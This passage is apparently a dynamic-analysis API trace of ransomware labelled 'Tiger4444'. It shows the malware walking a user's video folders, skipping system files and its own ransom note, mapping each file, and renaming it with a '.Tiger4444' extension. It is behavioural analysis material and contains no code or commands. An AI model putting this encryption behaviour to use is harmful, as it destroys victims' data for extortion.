lpNewFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\qkjB9QUudeJrk jkCRq.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\qkjb9quudejrk jkcrq.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.312] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=71696 | out: Addend=0xc6f980) returned 16265904 [0045.312] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4443 [0045.312] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e49da80, ftCreationTime.dwHighDateTime=0x1d4d30b, ftLastAccessTime.dwLowDateTime=0xd94574b0, ftLastAccessTime.dwHighDateTime=0x1d4cd81, ftLastWriteTime.dwLowDateTime=0xd94574b0, ftLastWriteTime.dwHighDateTime=0x1d4cd81, nFileSizeHigh=0x0, nFileSizeLow=0x128b7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rjtTtY.flv", cAlternateFileName="")) returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="Tiger4444.exe") returned -1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2=".") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="..") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="windows") returned -1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="bootmgr") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="pagefile.sys") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="boot") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="ids.txt") returned 1 [0045.312] lstrcmpiW (lpString1="rjtTtY.flv", lpString2="NTUSER.DAT") returned 1 [0045.312] lstrcpyW (in: lpString1=0x30aeafa, lpString2="rjtTtY.flv" | out: lpString1="rjtTtY.flv") returned="rjtTtY.flv" [0045.312] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\rjtTtY.flv", dwFileAttributes=0x0) returned 1 [0045.312] lstrlenW (lpString="rjtTtY.flv") returned 10 [0045.312] lstrlenW (lpString="Tiger4444") returned 9 [0045.312] lstrcmpiW (lpString1="jtTtY.flv", lpString2="Tiger4444") returned -1 [0045.312] lstrlenW (lpString=".dll") returned 4 [0045.312] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.313] lstrlenW (lpString=".lnk") returned 4 [0045.313] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.313] lstrlenW (lpString=".ini") returned 4 [0045.313] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.313] lstrlenW (lpString=".sys") returned 4 [0045.313] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.313] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\rjtTtY.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\rjttty.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.313] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.313] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13676596010) returned 1 [0045.313] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=75959) returned 1 [0045.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89950 [0045.313] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.313] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12bc0, lpName=0x0) returned 0x2c8 [0045.313] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12bc0) returned 0xbe0000 [0045.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.315] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.315] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13676825506) returned 1 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89950 | out: hHeap=0xc50000) returned 1 [0045.315] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.315] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.316] CloseHandle (hObject=0x2c8) returned 1 [0045.316] CloseHandle (hObject=0x260) returned 1 [0045.318] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\rjtTtY.flv.Tiger4444") returned 61 [0045.319] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\rjtTtY.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\rjttty.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\rjtTtY.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\rjttty.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.319] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=75968 | out: Addend=0xc6f980) returned 16337600 [0045.319] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4445 [0045.319] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79ff9f0, ftCreationTime.dwHighDateTime=0x1d4d15d, ftLastAccessTime.dwLowDateTime=0xd5823f90, ftLastAccessTime.dwHighDateTime=0x1d4d5ef, ftLastWriteTime.dwLowDateTime=0xd5823f90, ftLastWriteTime.dwHighDateTime=0x1d4d5ef, nFileSizeHigh=0x0, nFileSizeLow=0xc47e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X xmY.flv", cAlternateFileName="XXMY~1.FLV")) returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2="Tiger4444.exe") returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2=".") returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2="..") returned 1 [0045.319] lstrcmpiW (lpString1="X xmY.flv", lpString2="windows") returned 1 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="bootmgr") returned 1 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="pagefile.sys") returned 1 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="boot") returned 1 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="ids.txt") returned 1 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="NTUSER.DAT") returned 1 [0045.320] lstrcpyW (in: lpString1=0x30aeafa, lpString2="X xmY.flv" | out: lpString1="X xmY.flv") returned="X xmY.flv" [0045.320] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\X xmY.flv", dwFileAttributes=0x0) returned 1 [0045.320] lstrlenW (lpString="X xmY.flv") returned 9 [0045.320] lstrlenW (lpString="Tiger4444") returned 9 [0045.320] lstrcmpiW (lpString1="X xmY.flv", lpString2="Tiger4444") returned 1 [0045.320] lstrlenW (lpString=".dll") returned 4 [0045.320] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.320] lstrlenW (lpString=".lnk") returned 4 [0045.320] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.320] lstrlenW (lpString=".ini") returned 4 [0045.320] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.320] lstrlenW (lpString=".sys") returned 4 [0045.320] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.320] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\X xmY.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\x xmy.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.320] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.321] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13677366554) returned 1 [0045.321] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=50302) returned 1 [0045.321] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.321] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.321] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc780, lpName=0x0) returned 0x2c8 [0045.321] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc780) returned 0xbe0000 [0045.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.322] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.322] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0045.323] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.323] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0045.323] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.323] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.323] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13677689951) returned 1 [0045.324] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.324] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.324] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.325] CloseHandle (hObject=0x2c8) returned 1 [0045.325] CloseHandle (hObject=0x260) returned 1 [0045.327] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\X xmY.flv.Tiger4444") returned 60 [0045.327] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\X xmY.flv" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\x xmy.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\X xmY.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\x xmy.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.328] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=50304 | out: Addend=0xc6f980) returned 16413568 [0045.328] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4447 [0045.328] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa79ff9f0, ftCreationTime.dwHighDateTime=0x1d4d15d, ftLastAccessTime.dwLowDateTime=0xd5823f90, ftLastAccessTime.dwHighDateTime=0x1d4d5ef, ftLastWriteTime.dwLowDateTime=0xd5823f90, ftLastWriteTime.dwHighDateTime=0x1d4d5ef, nFileSizeHigh=0x0, nFileSizeLow=0xc47e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X xmY.flv", cAlternateFileName="XXMY~1.FLV")) returned 0 [0045.328] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0045.328] lstrcpyW (in: lpString1=0x30aeafa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0045.328] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\B0M8WjsC5SrNW4C-0\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\videos\\b0m8wjsc5srnw4c-0\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0045.328] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0045.328] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0045.330] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.330] CloseHandle (hObject=0x260) returned 1 [0045.330] CloseHandle (hObject=0x2ac) returned 1 [0045.331] GetCurrentThreadId () returned 0xfa8 [0045.331] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0045.331] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83" [0045.331] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc5e610 | out: hHeap=0xc50000) returned 1 [0045.331] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0045.331] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83" [0045.331] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\" [0045.331] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\.BFC0E91B00AE8A0620D3" [0045.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0045.333] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0045.336] FlushFileBuffers (hFile=0x2ac) returned 1 [0045.337] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0045.338] CloseHandle (hObject=0x2ac) returned 1 [0045.339] lstrlenW (lpString="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83") returned 37 [0045.339] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0045.339] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd89039e0, ftCreationTime.dwHighDateTime=0x1d4ca1d, ftLastAccessTime.dwLowDateTime=0xd51dedd0, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0x8009cf6c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0045.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.339] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.339] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0045.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0045.339] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd89039e0, ftCreationTime.dwHighDateTime=0x1d4ca1d, ftLastAccessTime.dwLowDateTime=0xd51dedd0, ftLastAccessTime.dwHighDateTime=0x1d4cb8e, ftLastWriteTime.dwLowDateTime=0x8009cf6c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.339] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.339] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.339] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.339] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.340] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8009cf6c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8009cf6c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8009cf6c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.340] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.340] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf2f1a60, ftCreationTime.dwHighDateTime=0x1d4ca1d, ftLastAccessTime.dwLowDateTime=0xd5addf00, ftLastAccessTime.dwHighDateTime=0x1d4ca60, ftLastWriteTime.dwLowDateTime=0xd5addf00, ftLastWriteTime.dwHighDateTime=0x1d4ca60, nFileSizeHigh=0x0, nFileSizeLow=0x10ec1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K8H_yKdZxq7njjSb.mkv", cAlternateFileName="K8H_YK~1.MKV")) returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="Tiger4444.exe") returned -1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2=".") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="..") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="windows") returned -1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="bootmgr") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="pagefile.sys") returned -1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="boot") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="ids.txt") returned 1 [0045.340] lstrcmpiW (lpString1="K8H_yKdZxq7njjSb.mkv", lpString2="NTUSER.DAT") returned -1 [0045.340] lstrcpyW (in: lpString1=0x30aeaf4, lpString2="K8H_yKdZxq7njjSb.mkv" | out: lpString1="K8H_yKdZxq7njjSb.mkv") returned="K8H_yKdZxq7njjSb.mkv" [0045.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\K8H_yKdZxq7njjSb.mkv", dwFileAttributes=0x0) returned 1 [0045.340] lstrlenW (lpString="K8H_yKdZxq7njjSb.mkv") returned 20 [0045.340] lstrlenW (lpString="Tiger4444") returned 9 [0045.340] lstrcmpiW (lpString1="njjSb.mkv", lpString2="Tiger4444") returned -1 [0045.340] lstrlenW (lpString=".dll") returned 4 [0045.340] lstrcmpiW (lpString1=".mkv", lpString2=".dll") returned 1 [0045.341] lstrlenW (lpString=".lnk") returned 4 [0045.341] lstrcmpiW (lpString1=".mkv", lpString2=".lnk") returned 1 [0045.341] lstrlenW (lpString=".ini") returned 4 [0045.341] lstrcmpiW (lpString1=".mkv", lpString2=".ini") returned 1 [0045.341] lstrlenW (lpString=".sys") returned 4 [0045.341] lstrcmpiW (lpString1=".mkv", lpString2=".sys") returned -1 [0045.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\K8H_yKdZxq7njjSb.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\k8h_ykdzxq7njjsb.mkv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.341] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.341] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13679402882) returned 1 [0045.341] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=69313) returned 1 [0045.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89ba8 [0045.341] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71bf8 [0045.341] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x111d0, lpName=0x0) returned 0x2c8 [0045.341] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x111d0) returned 0xbe0000 [0045.344] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.344] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.344] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.344] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.344] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13679730374) returned 1 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89ba8 | out: hHeap=0xc50000) returned 1 [0045.344] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0045.344] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.345] CloseHandle (hObject=0x2c8) returned 1 [0045.345] CloseHandle (hObject=0x260) returned 1 [0045.351] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\K8H_yKdZxq7njjSb.mkv.Tiger4444") returned 68 [0045.351] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\K8H_yKdZxq7njjSb.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\k8h_ykdzxq7njjsb.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\1GssRSL s5Lr83\\K8H_yKdZxq7njjSb.mkv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\1gssrsl s5lr83\\k8h_ykdzxq7njjsb.mkv.tiger4444"), dwFlags=0x1) returned 1 [0045.352] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=69328 | out: Addend=0xc6f980) returned 16463872 [0045.352] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4450 [0045.352] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x378836c0, ftCreationTime.dwHighDateTime=0x1d4c8fa, ftLastAccessTime.dwLowDateTime=0xd0787870, ftLastAccessTime.dwHighDateTime=0x1d4c95b, ftLastWriteTime.dwLowDateTime=0xd0787870, ftLastWriteTime.dwHighDateTime=0x1d4c95b, nFileSizeHigh=0x0, nFileSizeLow=0xdea3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TaaSYvvFHS17rq.mp4", cAlternateFileName="TAASYV~1.MP4")) returned 1 [0045.352] lstrcmpiW (lpString1="TaaSYvvFHS17rq.mp4", lpString2="HOW TO BACK YOUR 